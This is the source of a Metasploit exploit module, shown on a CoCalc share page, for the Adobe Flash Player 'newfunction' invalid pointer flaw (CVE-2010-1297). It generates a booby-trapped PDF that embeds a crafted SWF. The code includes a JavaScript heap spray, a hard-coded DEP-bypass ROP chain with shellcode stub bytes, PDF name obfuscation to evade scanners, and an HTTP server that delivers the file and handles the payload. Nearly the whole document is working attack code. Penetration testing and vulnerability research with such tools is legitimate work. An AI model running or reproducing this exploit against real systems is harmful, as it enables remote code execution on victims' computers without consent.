CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'zlib'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = NormalRanking

10


11
  include Msf::Exploit::Remote::HttpServer::HTML

12


13
  def initialize(info = {})

14
    super(update_info(info,

15
      'Name'           => 'Adobe Flash Player "newfunction" Invalid Pointer Use',

16
      'Description'    => %q{

17
          This module exploits a vulnerability in the DoABC tag handling within

18
        versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also

19
        vulnerable, as are any other applications that may embed Flash player.

20


21
        Arbitrary code execution is achieved by embedding a specially crafted Flash

22
        movie into a PDF document. An AcroJS heap spray is used in order to ensure

23
        that the memory used by the invalid pointer issue is controlled.

24


25
        NOTE: This module uses a similar DEP bypass method to that used within the

26
        adobe_libtiff module. This method is unlikely to work across various

27
        Windows versions due a hardcoded syscall number.

28
      },

29
      'License'        => MSF_LICENSE,

30
      'Author'         =>

31
        [

32
          'Unknown',   # Found being openly exploited

33
          'jduck'      # Metasploit version

34
        ],

35
      'References'     =>

36
        [

37
          ['CVE', '2010-1297'],

38
          ['OSVDB', '65141'],

39
          ['BID', '40586'],

40
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],

41
          # For SWF->PDF embedding

42
          ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']

43
        ],

44
      'DefaultOptions' =>

45
        {

46
          'EXITFUNC'          => 'process',

47
          'HTTP::compression' => 'gzip',

48
          'HTTP::chunked'     => true,

49
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

50
        },

51
      'Payload'        =>

52
        {

53
          'Space'    => 1000,

54
          'BadChars' => "\x00",

55
          'DisableNops' => true

56
        },

57
      'Platform'       => 'win',

58
      'Targets'        =>

59
        [

60
          # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd

61
          # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd

62
          # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd

63
          [ 'Automatic', { }],

64
        ],

65
      'DisclosureDate' => '2010-06-04',

66
      'DefaultTarget'  => 0))

67
  end

68


69
  def exploit

70
    # load the static swf file

71
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf" )

72
    fd = File.open( path, "rb" )

73
    @swf_data = fd.read(fd.stat.size)

74
    fd.close

75


76
    super

77
  end

78


79
  def on_request_uri(cli, request)

80


81
    print_status("Sending crafted PDF w/SWF")

82


83
    js_data = make_js(regenerate_payload(cli).encoded)

84
    pdf_data = make_pdf(@swf_data, js_data)

85
    send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })

86


87
    # Handle the payload

88
    handler(cli)

89
  end

90


91


92
  def make_js(encoded_payload)

93


94
    # The following executes a ret2lib using BIB.dll

95
    # The effect is to bypass DEP and execute the shellcode in an indirect way

96
    stack_data = [

97
      0xc0c0c0c,

98
      0x7004919,      # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret

99
      0xcccccccc,

100
      0x70048ef,      # xchg eax,esp / ret

101
      0x700156f,      # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]

102
      0xcccccccc,

103
      0x7009084,      # ret

104
      0x7009084,      # ret

105
      0x7009084,      # ret

106
      0x7009084,      # ret

107
      0x7009084,      # ret

108
      0x7009084,      # ret

109
      0x7009033,      # ret 0x18

110
      0x7009084,      # ret

111
      0xc0c0c0c,

112
      0x7009084,      # ret

113
      0x7009084,      # ret

114
      0x7009084,      # ret

115
      0x7009084,      # ret

116
      0x7009084,      # ret

117
      0x7009084,      # ret

118
      0x7009084,      # ret

119
      0x7009084,      # ret

120
      0x7001599,      # pop ebp / ret

121
      0x10124,

122
      0x70072f7,      # pop eax / ret

123
      0x10104,

124
      0x70015bb,      # pop ecx / ret

125
      0x1000,

126
      0x700154d,      # mov [eax], ecx / ret

127
      0x70015bb,      # pop ecx / ret

128
      0x7ffe0300,     # -- location of KiFastSystemCall

129
      0x7007fb2,      # mov eax, [ecx] / ret

130
      0x70015bb,      # pop ecx / ret

131
      0x10011,

132
      0x700a8ac,      # mov [ecx], eax / xor eax,eax / ret

133
      0x70015bb,      # pop ecx / ret

134
      0x10100,

135
      0x700a8ac,      # mov [ecx], eax / xor eax,eax / ret

136
      0x70072f7,      # pop eax / ret

137
      0x10011,

138
      0x70052e2,      # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)

139
      0x7005c54,      # pop esi / add esp,0x14 / ret

140
      0xffffffff,

141
      0x10100,

142
      0x0,

143
      0x10104,

144
      0x1000,

145
      0x40,

146
      # The next bit effectively copies data from the interleaved stack to the memory

147
      # pointed to by eax

148
      # The data copied is:

149
      # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83

150
      # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff

151
      # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90

152
      0x700d731,      # mov eax, [ebp-0x24] / ret

153
      0x70015bb,      # pop ecx / ret

154
      0x9054905a,

155
      0x700154d,      # mov [eax], ecx / ret

156
      0x700a722,      # add eax, 4 / ret

157
      0x70015bb,      # pop ecx / ret

158
      0x5815eb5a,

159
      0x700154d,      # mov [eax], ecx / ret

160
      0x700a722,      # add eax, 4 / ret

161
      0x70015bb,      # pop ecx / ret

162
      0x18891a8b,

163
      0x700154d,      # mov [eax], ecx / ret

164
      0x700a722,      # add eax, 4 / ret

165
      0x70015bb,      # pop ecx / ret

166
      0x8304c083,

167
      0x700154d,      # mov [eax], ecx / ret

168
      0x700a722,      # add eax, 4 / ret

169
      0x70015bb,      # pop ecx / ret

170
      0xfb8104c2,

171
      0x700154d,      # mov [eax], ecx / ret

172
      0x700a722,      # add eax, 4 / ret

173
      0x70015bb,      # pop ecx / ret

174
      0xc0c0c0c,

175
      0x700154d,      # mov [eax], ecx / ret

176
      0x700a722,      # add eax, 4 / ret

177
      0x70015bb,      # pop ecx / ret

178
      0x5ebee75,

179
      0x700154d,      # mov [eax], ecx / ret

180
      0x700a722,      # add eax, 4 / ret

181
      0x70015bb,      # pop ecx / ret

182
      0xffffe6e8,

183
      0x700154d,      # mov [eax], ecx / ret

184
      0x700a722,      # add eax, 4 / ret

185
      0x70015bb,      # pop ecx / ret

186
      0x909090ff,

187
      0x700154d,      # mov [eax], ecx / ret

188
      0x700a722,      # add eax, 4 / ret

189
      0x70015bb,      # pop ecx / ret

190
      0x90909090,

191
      0x700154d,      # mov [eax], ecx / ret

192
      0x700a722,      # add eax, 4 / ret

193
      0x70015bb,      # pop ecx / ret

194
      0x90909090,

195
      0x700154d,      # mov [eax], ecx / ret

196
      0x700a722,      # add eax, 4 / ret

197
      0x70015bb,      # pop ecx / ret

198
      0x90ffffff,

199
      0x700154d,      # mov [eax], ecx / ret

200
      0x700d731,      # mov eax, [ebp-0x24] / ret

201
      0x700112f       # call eax -- (execute stub to transition to full shellcode)

202
    ].pack('V*')

203


204
    var_unescape  = rand_text_alpha(rand(100) + 1)

205
    var_shellcode = rand_text_alpha(rand(100) + 1)

206


207
    var_start     = rand_text_alpha(rand(100) + 1)

208


209
    var_s         = 0x10000

210
    var_c         = rand_text_alpha(rand(100) + 1)

211
    var_b         = rand_text_alpha(rand(100) + 1)

212
    var_d         = rand_text_alpha(rand(100) + 1)

213
    var_3         = rand_text_alpha(rand(100) + 1)

214
    var_i         = rand_text_alpha(rand(100) + 1)

215
    var_4         = rand_text_alpha(rand(100) + 1)

216


217
    payload_buf = ''

218
    payload_buf << stack_data

219
    payload_buf << encoded_payload

220


221
    escaped_payload = Rex::Text.to_unescape(payload_buf)

222


223
    js = %Q|

224
var #{var_unescape} = unescape;

225
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );

226
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );

227
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};

228
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);

229
#{var_b} += #{var_shellcode};

230
#{var_b} += #{var_c};

231
#{var_d} = #{var_b}.substring(0, #{var_s}/2);

232
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};

233
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);

234
var #{var_4} = new Array();

235
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";

236
|

237


238
    js

239
  end

240


241
  def random_non_ascii_string(count)

242
    result = ""

243
    count.times do

244
      result << (rand(128) + 128).chr

245
    end

246
    result

247
  end

248


249
  def io_def(id)

250
    "%d 0 obj\n" % id

251
  end

252


253
  def io_ref(id)

254
    "%d 0 R" % id

255
  end

256


257


258
  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/

259
  def n_obfu(str)

260
    result = ""

261
    str.scan(/./u) do |c|

262
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'

263
        result << "#%x" % c.unpack("C*")[0]

264
      else

265
        result << c

266
      end

267
    end

268
    result

269
  end

270


271


272
  def ascii_hex_whitespace_encode(str)

273
    result = ""

274
    whitespace = ""

275
    str.each_byte do |b|

276
      result << whitespace << "%02x" % b

277
      whitespace = " " * (rand(3) + 1)

278
    end

279
    result << ">"

280
  end

281


282


283
  def make_pdf(swf, js)

284


285
    swf_name = rand_text_alpha(8 + rand(8)) + ".swf"

286


287
    xref = []

288
    eol = "\n"

289
    endobj = "endobj" << eol

290


291
    # Randomize PDF version?

292
    pdf = "%PDF-1.5" << eol

293
    #pdf << "%" << random_non_ascii_string(4) << eol

294


295
    # catalog

296
    xref << pdf.length

297
    pdf << io_def(1) << n_obfu("<</Type/Catalog")

298
    pdf << n_obfu("/Pages ") << io_ref(3)

299
    pdf << n_obfu("/OpenAction ") << io_ref(5)

300
    pdf << n_obfu(">>")

301
    pdf << eol << endobj

302


303
    # pages array

304
    xref << pdf.length

305
    pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj

306


307
    # page 1

308
    xref << pdf.length

309
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)

310
    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")

311
    pdf << n_obfu(">>")

312
    pdf << eol << endobj

313


314
    # js action

315
    xref << pdf.length

316
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj

317


318
    # js stream

319
    xref << pdf.length

320
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))

321
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol

322
    pdf << "stream" << eol

323
    pdf << compressed << eol

324
    pdf << "endstream" << eol

325
    pdf << endobj

326


327
    # swf annotation object

328
    xref << pdf.length

329
    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")

330
    pdf << n_obfu("/Rect [20 20 187 69] ")

331
    pdf << n_obfu("/RichMediaSettings ") << io_ref(8)

332
    pdf << n_obfu("/RichMediaContent ") << io_ref(9)

333
    pdf << n_obfu("/NM (") << swf_name << n_obfu(")")

334
    pdf << n_obfu(">>")

335
    pdf << eol << endobj

336


337
    # rich media settings

338
    xref << pdf.length

339
    pdf << io_def(8)

340
    pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")

341
    pdf << n_obfu("/Activation ") << io_ref(10)

342
    pdf << n_obfu("/Deactivation ") << io_ref(11)

343
    pdf << n_obfu(">>")

344
    pdf << eol << endobj

345


346
    # rich media content

347
    xref << pdf.length

348
    pdf << io_def(9)

349
    pdf << n_obfu("<</Type/RichMediaContent")

350
    pdf << n_obfu("/Assets ") << io_ref(12)

351
    pdf << n_obfu("/Configurations [") << io_ref(14) << "]"

352
    pdf << n_obfu(">>")

353
    pdf << eol << endobj

354


355
    # rich media activation / deactivation

356
    xref << pdf.length

357
    pdf << io_def(10)

358
    pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")

359
    pdf << eol << endobj

360


361
    xref << pdf.length

362
    pdf << io_def(11)

363
    pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")

364
    pdf << eol << endobj

365


366
    # rich media assets

367
    xref << pdf.length

368
    pdf << io_def(12)

369
    pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")

370
    pdf << eol << endobj

371


372
    # swf embeded file ref

373
    xref << pdf.length

374
    pdf << io_def(13)

375
    pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")

376
    pdf << eol << endobj

377


378
    # rich media configuration

379
    xref << pdf.length

380
    pdf << io_def(14)

381
    pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")

382
    pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")

383
    pdf << eol << endobj

384


385
    # rich media isntance

386
    xref << pdf.length

387
    pdf << io_def(15)

388
    pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")

389
    pdf << n_obfu("/Asset ") << io_ref(13)

390
    pdf << n_obfu(">>")

391
    pdf << eol << endobj

392


393
    # swf stream

394
    # NOTE: This data is already compressed, no need to compress it again...

395
    xref << pdf.length

396
    pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol

397
    pdf << "stream" << eol

398
    pdf << swf << eol

399
    pdf << "endstream" << eol

400
    pdf << endobj

401


402
    # trailing stuff

403
    xrefPosition = pdf.length

404
    pdf << "xref" << eol

405
    pdf << "0 %d" % (xref.length + 1) << eol

406
    pdf << "0000000000 65535 f" << eol

407
    xref.each do |index|

408
      pdf << "%010d 00000 n" % index << eol

409
    end

410


411
    pdf << "trailer" << eol

412
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

413


414
    pdf << "startxref" << eol

415
    pdf << xrefPosition.to_s() << eol

416


417
    pdf << "%%EOF" << eol

418
    pdf

419
  end

420
end

421


422